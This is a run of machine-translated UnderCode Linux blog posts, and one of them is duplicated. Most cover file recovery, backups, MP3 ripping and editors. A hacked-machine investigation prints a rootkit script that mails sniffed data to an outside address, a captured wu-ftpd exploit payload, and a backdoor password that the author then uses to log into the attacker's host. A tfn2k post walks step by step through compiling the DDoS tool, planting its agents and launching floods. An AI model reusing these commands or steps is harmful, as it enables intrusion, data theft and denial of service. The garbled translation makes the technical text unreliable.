▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Miscellaneous Tools-Recover Deleted Files in ext2 File System :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) if you accidentally accidentally deleted an important file, such as rm -rf kkk And kkk is a very important file for you, you must be very painful, at this time you must not panic, you should stop writing any files to your hard disk immediately. It is completely recoverable. (I wrote the following specifically for the ext2 file system, other file systems have methods, I will write later):
#debugfs / dev / hda1 (the partition where the deleted file is located)
debugfs: lsdel
can list your recent The inode table of the deleted file is roughly as follows:

2) Inode Owner Mode Size Blocks Time deleted

3) This is the node table number, owner, file attributes (that is, read, write, etc.), size, block (generally 1block = 1K), when deleted time. With this information, you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <the value of the inode table you want to restore> / home / directory (to that directory)
OK! It's that simple, you can find it in / home / directory.

4) Of course, if you have a lot of files, doing this one by one is definitely troublesome, you can download some tools. I give it here:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please send here,

5) During the practice of the brothers, such information appeared, and they did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 / root
311543: File not found by ext2_lookup
debugfs:

6)wants to restore this 311543 because I am in the / root directory I deleted a file, I saw it was 311543, but using the following command to restore, the above prompt appeared

7) You should be like this.

Debugfs: dump <311543> / root / ppp (any file name).
Try again . Did you

succeed?

8) I am now under windows, and my linux is JFS. Recovery is more convenient. Etc. Will I switch to LINUX and build an ext2 system, I have tried it before, and it must be


9) ok . Dude is terrific, serve it, and it will be OK. . . .
Now my brother has a question: I deleted a .tar.gz file, but after the restoration is complete, I cannot use
#tar zxvf * tar.gz to extract it.

10) The other is how to restore the original file name. For example, I deleted wine.tar.gz, but I ca n’t remember what the specific file name is, but I want to restore the original file name, such as I deleted important files in the system, but I don't remember what kind of file name it is, but this file name is extremely important to the system, such as mozilla under / usr / bin. How can I do this? ?

11) The main reason is to know why. The answer is simple. To know the file name, use
debugfs: ls -d.

12) As for the file cannot be used, it is because the dump is a continuous block, and your file may not be a continuous block.
Use debugfs: stat <inode> to see its status, and then dd them down one by one (of course there are tools to save a lot of effort).

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Bluefish web editor based on Linux text mode:
fb.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive, and any beginner can quickly get started and discover and continually accumulate Master its other features. If you need a text editor that can design web code, then it will be a very good software. The overall impression it gives me is professional but not intimidating, and the combination of text and icons is good.

2) Bluefish provides many common HTML task options, such as fonts, tables, etc., and of course links. This software uses a less common "anchor" to indicate clickable links. The Link Description dialog box even provides Java script event functions such as OnClick and OnMouseover.

3) It also has other dialogs to create text in PHP and SQL tasks. Like many Apache and C options, you can also group files by project for development. The search and replace function is also very good, it also supports regular expressions, and you can also customize syntax highlighting for multiple languages.

4) Let me talk about some of its shortcomings. If you need some documentation help, then you need to open a separate document, because help is not integrated with this application. Its instructions are very extensive, and if you are patient, you can certainly find what you want. For example, for me, spell checking didn't let me find it quickly, but after I read the instructions, I found that you must install a standalone open source Aspell application to be able to perform spell checking.

5) Macros are operated through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search and replace commands. The creation of text strings includes some dialog boxes with additional features, which are very simple to use.

6) Somewhat disappointingly, in such an intuitive interface, I didn't find the "Edit" custom menu for the macro I created, but if you refer to the steps on the instructions, everything is clear. Macro functions may not be so powerful compared to some other applications. For example, I cannot find how to use other Bluefish commands in the custom menu, but they are very convenient for repeated input.

7) Finally, Bluefish does not position itself as an application for writing, nor does it have some commands for text manipulation, such as changing capital letters or merging or splitting lines.

8) That said, if you are looking for a moderately functional text-based web code editing application, Bluefish is definitely worth a try.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Make Incremental Backups linux :
T.me/underCodeTesting

1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.

2) For example to generate a list of files that have changed in the last 24 hours use:
　find / -mtime -1! -Type d -print> /tmp/filelist.daily

3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.

>　find / -mtime -7 -print> / tmp /filelist.weekly

　4) 　when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:

> 　tar -cv -T /tmp/filelist.daily -f / dev / fd0

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Make Incremental Backups linux :
T.me/underCodeTesting

1) The first step in creating an incremental backup is to generate a list of files that have changed in the past This is usually achieved by the find command.

2) For example to generate a list of files that have changed in the last 24 hours use:
　find / -mtime -1! -Type d -print> /tmp/filelist.daily

3) where the -mtime -1 option will make find change the past 24 hours to find out through the archives; -type d will find files from the list!
remove the name of the directory to find all files similar changes in the past week off with:.

>　find / -mtime -7 -print> / tmp /filelist.weekly

　4) 　when generating a list of files to be backed up, put a file in the list, use the tar -T option to specify a file that contains
a list of files to be backed up. for example listed in the file / tmp / filelist Back up all files in .daily to device / dev / fd0, use:

> 　tar -cv -T /tmp/filelist.daily -f / dev / fd0

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Tracking a hack full tutorial by undercode :
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) I check my machine, the unexpected discovery was hacked
actually my own mistakes, not patched wuftpd26, but also Without changing / etc / ftpusers,
people can easily use wuftpd26's remote vulnerability to enter my machine with anonymous users. However, this friend apparently used the rootkit without consideration

🦑 As a result, the output of ps is as follows:
[root @ ns] # ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 / sbin / mingetty tty1
679 2 S 0: 00 / sbin / mingetty tty2
680 3 S 0:00 / sbin / mingetty tty3
681 4 S 0:00 / sbin / mingetty tty4
682 5 S 0:00 / sbin / mingetty tty5
683 6 S 0:00 / sbin / mingetty tty6
5557? S 0:00 / bin / sh -i
5591? R 0:00 ps

🦑 I think anyone knows what it means. So let's take a step by step to see what he did
[this hack did not expect that this machine already has an owner, and installed its own rootkit toolkit]

1) [root @ ns] # strings / bin / login | more
..........
__bss_start
_end
PPRV
DISPLAY
/ bin / envpc
l4m3r0x
/ bin / sh

2) From the above, it can be seen that it is a login backdoor, through export PATH = \ After "l4m3r0x \", you can directly telnet each other to get #
[root @ ns] # strings / bin / ls | more
.....
always
/ usr / local / share / locale
fileutils
GNU fileutils-3.13
vdir
% s-% s
/dev/sgk/.fsdc/.1file
// DIRED //
// SUBDIRED //
POSIXLY_CORRECT
COLUMNS

3) Note that /dev/sgk/.fsdc/.1file is where his rootkit file is located, so let's See what's there
[root @ ns] # mv /dev/sgk/.fsdc/.1file / tmp
[root @ ns] # ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undrecode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
XR-X. 1--rwxr undercode 28004 Real-Aug-PS 23 is
-rwxr XR-580 696-X. 1 undercode On Feb 2000 SSH 18 is
-rw-R & lt - r--. 1 the root FTP 1398 System On Feb. 4 08:55

4) Oh It seems that there are quite a lot of things. From ftp, we can know that he is using the ftP vulnerability. From lujiang, he also stole a local user
[root @ ns .fsdc] # cat .1logz
rshd
[root @ ns .fsdc] # cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root @ ns .fsdc] # cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse

5) Logz is called by syslogd, which hides the records generated by the listed commands.
.1proc is called by the ps command. Hides the listed process names
. Listed file names,
[root @ ns .fsdc] # cd patches
[root @ ns patches] # cat patch.sh
#! / Bin / sh
echo \ "[1] Patching WU-FTPd ... \"
rpm -Uhv wuftpd.rpm
echo \ "[2] Patching NFS-utils ... \"
rpm -Fvh nfs-utils.rpm
ps aux >> / tmp / psaux
if [\ " cat / tmp / psaux | grep rpc. statd \ "]; then
echo \" [3] Restarting the rpc.statd daemon (NFS-utils) \ "
/etc/rc.d/init.d/nfslock restart
else
echo \ "[4] The daemon rpc.statd isn \ t running, so no need to restart! \"
fi
rm / tmp / psaux

6) This is a patch package for the wuftpd and rpc.statd vulnerabilities. ]
other file directory I did not carefully read [these will provide the download package]
according to the list of hidden files .1file us one find these documents.
[root @ ns .fsdc] # strings / usr / bin / xtty
. .....
PPRV
(nfsiod)
socket
bind
listen
accept
/ bin / sh

7) It is not difficult to see that it is a backdoor
[root @ ns .fsdc] # strings / dev / pttys
#! / Bin / sh
cat /dev/sgk/.fsdc/ system | mail prosupp@usa.net > / dev / null 2> & 1
nohup / usr / lib / lpset> / dev / null &
nohup / usr / bin / xtty> / dev / null &
rm -rf nohup.out
this The hack is very smart, and you can send sniffing records to this scriptprosupp@usa.net [/dev/sgk/.fsdc/system是个嗅探记录]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=\%.100s\, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new% d bit RSA key.
RSA key generation complete.
F: p: b: k: h: g: diqV:
i686-unknown-linux
1.2.27
sshd version% s [% s]
Usage:% s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine will open a convenient door for
hacking after startup. [Root @ ns .fsdc] # strings / sbin / syslogd
=========== =======================================================
Time:% s Size:% d
Path:% s
=>% s [% d]
------------------------------ ------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/ dev / null
eth0
system
cant open log

🦑 This hack changed the syslogd file into a sniffer

. . . . . . . . . .
The next step is to restore the system and modify the stolen account password. This is not a complaint here. From my sniffing records, I know that he came from these two machines.

[Root @ ns man] # more system2
================ =================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
--------------------------- ---------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================

🦑 From the above we know that the hack was attacked from 210.217.237.75. According to habits, usually the same backdoor is done, so
[root @ ns man] # export DISPLAY = \ "l4m3r0x \"
[root @ ns man] # telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is \^]\.

> Boramae Cache Server 3.5.1

bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 / sbin / mingetty tty5 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
944 6 S 0:00 / sbin / mingetty tty6 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
957 1 S 0:00 -bash HOME = / root PATH = / sbin: / bin: / usr / sbin: / usr / bin SHELL = /
22151? S 0:00 -bash HOME = / root USER = root LOGNAME = root PATH = / usr / bin: / bin:
22178? S 0:00 \\ _ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN = | / usr / bin /
. . . . . . . . . .

3) Use the rpm command to see if often used commands are modified

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TRACKING A HACK FULL BY UNDERCODE

This methode is used by GOV

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Beautify and Finish-Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Many friends who like music will try to make MP3s on CDs on their computers, of course, users of Linux You can also make your own MP3s. This is not a Windows / Mac patent. This time I will introduce two Linux programs for making MP3.

My favorite is Grip written in GTK +.

1) Grip is not actually an MP3 encoder or a CD-tracking program. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.

2) As for CD ripper (grabbing CD Track program), Grip supports cdparanoia and cdda2wav. Look at the MP3 encoder again, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, etc., which is quite beneficial! I use cdparanoia and bladeenc.

🦑 The following is the URL of some CD ripper / MP3 encoder:


1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav

2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html

3) You can choose one of the CD ripper and MP3 encoder, and you can use Grip after installation. If you are using rpm, I suggest you use cdparanoia / cdda2wav + gogo. Their RPM can be downloaded from the following URL:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm

4) If you are using Debian / Corel / Storm linux, you can choose to use the two Debian packages cdparanoia / cdda2wav, but because of copyright issues, Debian does not have the MP3 Encoder package, you need to install it yourself.

5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.

6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.

7) Then you can put your beloved Audio CD into the CD-ROM drive, and you can see that the forms in Tracks have been automatically updated. If you have time, you can click the "Pencil" key below to give CDs and Tracks proper names. In the form, we need to press the right mouse button to select the song. After selecting it, select the Rip page and press Rip + Encode. Then the selected Tracks will be made into MP3. Grip can also grab a part of the track, select the Rip partial track, press Play, note the sector at the beginning and end of the part, and enter them in the Start sector and End sector, respectively. When the process is complete, the created MP3s will be in the mp3 directory in the home director, ie ~ / mp3 /.

🦑 KDE Department: Krabber

1) Krabber is another frontend for CD Ripper and MP3 Encoder. Krabber is developed using QT and KDE library, so only KDE users can use it. This is a major disadvantage of Krabber ... (I have not used KDE, and I have to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc, xingmp3enc, but Krabber can automatically detect whether the system has the required elements.

2) It needs mpg123 to play MP3. Krabber's settings are similar to Grip. Format selects the installed MP3 encoder, and the first box in Generic Options selects your input device, such as / dev / hdc (CDROM drive). One feature of Krabber that Grip does not have is to adjust CPU resources so that you can record MP3s while working. Krabber is relatively easy to use, just follow its four steps:
choose a song, choose a directory, file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org The

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) Download the following files in the same directory first
* up2date-3.1.23.2 -1.i386.rpm-MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm-MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm

2) Check MD5 code
[user @ localhost user] $ md5sum 'filename'

3) [user @ localhost user] $ su
Password: (enter root password)

4) [root @ localhost user] # rpm -Fvh up2date- *

5) [root @ localhost user] # up2date -pIf

you refuse to connect on the 5th, it is because rh requires you to reactivate your Account, you can go to https://rhn.redhat.com/renew/ and

enter your username and answer any questions you want to activate your account. The
other versions are the same

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

　Denial of service attack (DOS, Denial Of Service) can refer to any operation that makes the service unable to be provided normally. For example, software bugs, operation errors, etc. However, the possibility of dos caused by incorrect operations is very small, and more malicious attacks. Denial of service attacks have now evolved into Distributed Denial of Service (DDOS) attacks, which use more agents to focus on the target, which is more harmful.

> We all know that the TCP / IP protocol has now become the entire Internet framework protocol It can be said that if there is no tcp / ip, at least the internet will not be as popular as it is now, and there will not even be an internet. But everything has two sides, tcp / ip benefits us all, and because of the problem of the protocol itself, Become a tool for others to attack us. We will use the TCP three-way handshake to establish the connection to illustrate.　　

🦑 First, the TCP syn flood
　　

1) The client sends a tcp packet containing SYN (synchronize) to the server. This packet contains basic information such as the client port and tcp sequence number.

2) After the server receives the SYN packet, it will send a SYN-ACK packet to confirm.

3) After receiving the SYN-ACK packet from the server, the client will send an ACK back to the server. If the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like, heaven and earth ... two churches) ... into the cave ... haha) The

> problem lies in step 3. If the server cannot receive the client's ACK packet, it will wait. This state is called a semi-connected state. It will be kept for a certain period of time (the specific time varies with different operating systems). If the SYN request exceeds the limit that the server can accommodate and the buffer queue is full, the server will no longer accept new requests, and connections from other legitimate users will be rejected . This kind of attack is often half-sin, and it is extremely lethal.

🦑 　Of course, there are various methods of DOS attack, such as: UDP flood, ICMP / Ping, ICMP / SMURF ..., the specific principles can be introduced at http://www.chinaitlab.com/www/special/ciwddos.asp Take a look, there are very detailed principles and introduction of commonly used attack software. However, when it comes to DOS attack software, the most representative is tfn2k (Tribe Flood Network 2000), whose author is the famous mixter in Germany (its home page http://mixter.void.ru/papers.html), it seems that it is currently buried What tfn3k, hey , I don't know how many people are sleeping

and eating ... two. Tfn2k attack principle

　　1) tfn2k attack system.

　　tfn2k should be regarded as a masterpiece of DDOS attacks, and its functions can be astounding and amazing ... (awe of it is like a river, it continues ...) Let's take a look at its architecture.

　　Master --- Run tfn client to remotely control and specify attack targets, change the attack method. (Sinister evil)

　　Agent --- is the victim of implanted and running td process, accept the command of tfn, the implementer of the attack. It should be noted that an attacker often controls multiple agents to complete the attack, and the system is mostly unix, linux, etc. (Poor victim) The

　　target host --- the host or network that was attacked by DDOS Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, depressed like me)

　2) tfn2k features.

　　◆ The master sends the command to the agent host through TCP, UDP, ICMP or random use of one of the packets (default. Random). The attack methods include TCP / SYN, UDP, ICMP / PING, mixed attacks, TARGA3, etc. .

　　◆ The communication between the master and the agent is unidirectional, that is, the master only sends commands to the agent, and it will use random header information, even virtual source address information. The agent will not send any information to the master in the reverse direction. .

　　after CAST-256 algorithm plus life, enter a keyword that is when it all compiler ◆ password command. and this password as the only authentication credentials.

　　◆ use td process, the master device can execute remote shell command.

　　◆ td process The name can be changed at compile time, which makes it easier to hide.

　　◆ tfn can compile and run on win32 and linux systems

　　...

　　As for the function of falsifying the source IP address, it is more basic, and compared with the old version of tfn, It is more efficient to

send out packages . In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system. Three . Tfn2k actual test

　　1 ) Test environment:

　　　Software: redhat linux 9.0
　　　Hardware platform:
　　　　 master:
　　　　　　　 IP: 192.168.0.6
　　　　　　　PIV2.4 / 256 * 2 / rtl8139
　　　　 Ag1:
　　　　　　　 IP: 192.168.0.2
　　　　　　　PIV2.4 / 256 * / rtl8139
　　　　 AG2: IP: 192.168.0.3
　　　　　　　pIV2.6 / 512 * 2 / 3c905
　　　　 AIM: 192.168.0.5
　　　　　　　pIV2.66c / 512 * 2 / 3c905
　　　　 switch: D_link des 1024R

　　1) Download tfn2k.tgz (Because this software is unusual, I do n’t provide the download address. If you are interested, Find it online)

　　2) Unzip: tar zxvf tfn2k.tgz

　　3) Modify the file

　　A. src / Makefile If your system is a linux system, you do n’t need to do any repairs. If it is a win32 system, please


　　　　　 # Linux / * BSD * / Others
　　　　　　CC = gcc
　　　　　　CFLAGS = -Wall -O3
　　　　　　CLIBS =

　　These lines are commented out, and


　　　　　 # Win32 (cygwin)
　　　　　 #CC = gcc
　　　　　 #CFLAGS = -Wall -DWINDOZE -O2
　　　　　 #CLIBS = Uncomment

　　these lines. Because my test system is redhat linux 9.0, no changes have been made.

　　B. src / config. h, which is available by default. If you are interested, you can adjust it according to its annotation information.

　　C. src / ip.h Make some changes here, otherwise there will be compilation errors and duplicate definitions.


　　　　　/ * struct in_addr
　　　　　　{
　　　　　　 unsigned long int s_addr;
　　　　　}; * /

　　Note ~ I put it between "/ * * /", which is commented out :) 　　　

　　D) Change the compiler:

　　because tfn2k supports It is egcs-1.1.2-30, and redhat linux9.0 contain

s gcc-3.2.2-5, so if you do not replace gcc, tfn2k cannot be compiled. It should be noted that after the change, It will cause the software based on gcc3.2.2 not to compile, please be cautious. The

　　method is very simple, find a redhat linux 6.2 installation disk, set egcs-1.1.2-30.rpm, cpp-1.1.2-30. Copy rpm to ~ /


　　　 cd / mnt / cdrom / Redhat / RPMS
　　　 cp egcs-1.1.2-30 * cpp-1.1.2-30 * ~ /

　　Install cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

　　Install egcs rpm -Uvh egcs-1.1.2-30.i386.rpm

　　(if prompted incorrectly, use nodeps, oldpackages, ignoreos Wait for the parameters to ignore the past)

　　4) Compile tfn2k


　　　 cd tfn2k / src
　　　 make

　　first will talk about a statement, you must accept it, and then you will be prompted to enter an 8-32 bit password, as mentioned earlier, this is the only authentication credential, will be Distributed in the td process, so be sure to remember it ~.

　　After compiling, td and tfn will be generated. This is the famous tfn2k ~, td is a daemon process used to install in the agent, and tfn is the control end.

　　5) Install td.

　　Upload td to my two Agents, ag1 (192.168.0.2) and ag2 (192.168.0.3), because I'm just testing, so I use a legitimate root to upload and execute the td process. If you really want to find and install an agent, you may have to pay God, because no administrator will say "come on baby . I will give you root, and install td as a proxy"


　　 [root @ test /] ftp 192.168.0.2
　　　　　 Connected to 192.168.0.2.
　　　　　 530 Please login with USER and PASS.
　　　　　 530 Please login with USER and PASS.
　　　　　 Name (192.168.0.2:root): wjpfjy
　　　　　 331 Please specify the password.
　　　　　 Password:
　　　　　 230 Login successful. Have fun.
　　　　　 Remote system type is UNIX.
　　　　　 Using binary mode to transfer files.
　　　　Ftp> put td (upload td)
　　　　　local: td remote : td
　　　　　227 Entering Passive Mode (192,168,0,3,198,225)
　　　　　553 Could not create file.
　　　　ftp> by (quit ftp)
　　　　 221 Goodbye.

　　 [root @ test /] ssh 192.168.0.2
// Log in to ag1 to execute td, note, I use the root account so that I have sufficient permissions to execute it.
　　　　　　 Root@192.168.0.2's password:
　　　　　　 Last login: Tue Feb 24 06:51:13 2004
　　 [root @ ag1 /] find / -name td- print
// Find the file td just uploaded.
　　 [root @ ag1 wjpfjy /] chmod a + x td
// Make it execute.
　　 [root @ ag1 wjpfjy /]./ td
// Run td, so you have a proxy, and it will only command you From: (.

　　

　　Use the same method to install and run the TFN2k process td on ag2 (192.168.0.3). 　　

　　6) The attack begins (the tragic memory is being staged ...)

　　Return to the master (192.168.0.6) and prepare for the exercise. ..


　　　[root @ master root] #touch host.txt
// Set up a proxy record file (because if you are bored enough, you may create a lot of broilers-
// proxy, do n’t write down and forget it.)
　　[root @master root] echo "192.168.0.2"> host.txt Add ag1 that has executed td to host.txt.
　　[root @ master root] echo "192.168.0.3" >> host.txt Add ag2 to host.txt.

　　First

　　Let's test the link. [Root @ master root] ./ tfn -f host.txt -c 10 -i "mkdir wjpfjy" Communicate with the agent in host.txt and let it execute the command mkdir wjpfjy to create a directory


　　 Protocol: random
　　　　Source IP: random
　　　　Client input:list
　　　　Command: execute remote command

　　　 Password verification:　　　　
// Here, you will be prompted to enter the password, which is the password entered during compilation. If you make a mistake, you will not be able to communicate with the td process.

　　　 Sending out packets: ..

　　Go to ag1 and ag2 to see if there is Create a directory name wjpfjy. Generally, it will exist in the same directory of td. If you are not sure, you can use find / -name wjpfjy -print to find 　　

　　[root @ master root] ./ tfn -f host.txt -c 6- i 192.168.0.5 started ICMP / PING attack aim ... (Poor my P4, less than 5 minutes, as slow as 386), but before the game over, it still had a hard time recording the attack data, also It can be regarded as the NK Ocean. This is the packet capture record of tcpdump.

[Root @ aim root] # tcpdump -r pack.atta -c 4 -xX
08: 03: 36.524907 23.43.171.0> 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524933 192.168.0.5> 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
